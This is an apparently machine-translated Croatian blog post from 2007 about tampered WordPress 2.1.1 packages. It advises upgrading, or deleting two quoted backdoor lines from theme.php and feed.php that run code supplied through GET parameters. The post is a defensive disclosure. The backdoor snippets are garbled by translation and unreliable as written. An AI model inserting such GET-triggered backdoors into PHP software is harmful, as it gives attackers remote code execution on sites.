Pretplatite se na newsletter ili RSS feed za primanje ažuriranja automatski blog!

Wordpress 2.1.1 je opasno!



Evo kako je tim Wordpress definira novije verziju WP. Razlog je jednostavan: prije nekoliko dana jedan kreker je prekršio neki od poslužitelja worpress.org, upravljanje za promjenu instalacijski paket koji se najčešće preuzeli su i: promjene izgleda da uključuju samo nekoliko datoteka omogućiti daljinsko izvršavanje php kod. Da biste riješili taj problem, postoje dvije mogućnosti:

    1. Download verzija 2.1.2 promptno izdane od strane programera za Wordpress i nadogradnje.
    2. Ukloni od ruke malicioznog koda (ako poput mene ne žele / vrijeme instalirati novu verziju).
    To je jednostavno:
    - Odredite i uklonite datoteke "wp-includes/theme.php" sljedeći redak koda: 
      if ($ _GET [ "Iž"]) (get_theme_mcommand ($ _GET [ "iz "]);)

    - Odredite i uklonite datoteke "wp-includes/feed.php" sljedeći redak koda: 

      if ($ _GET [ 'IX']) (comment_text_phpfilter ($ _GET [ 'ix']);)


Jeste li kao što je ovaj članak? Prijavite se za primanje ažuriranja ili newsa:
Pretplati se na RSS izvore pisati na RSS feed


Datum Posted, March 6, 2007 u 12:06 u sigurnosti, Web
Dijeljenje Dionički | Tags: web,

Još nema komentara '

Komentari RSS feed za ovaj post. Trackback URI

Ostavite komentar

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Nothing2Hide © 2006 Sva prava pridržana.

Licenca | Odricanje od odgovornosti

Zatvoriti
Pošalji e-mail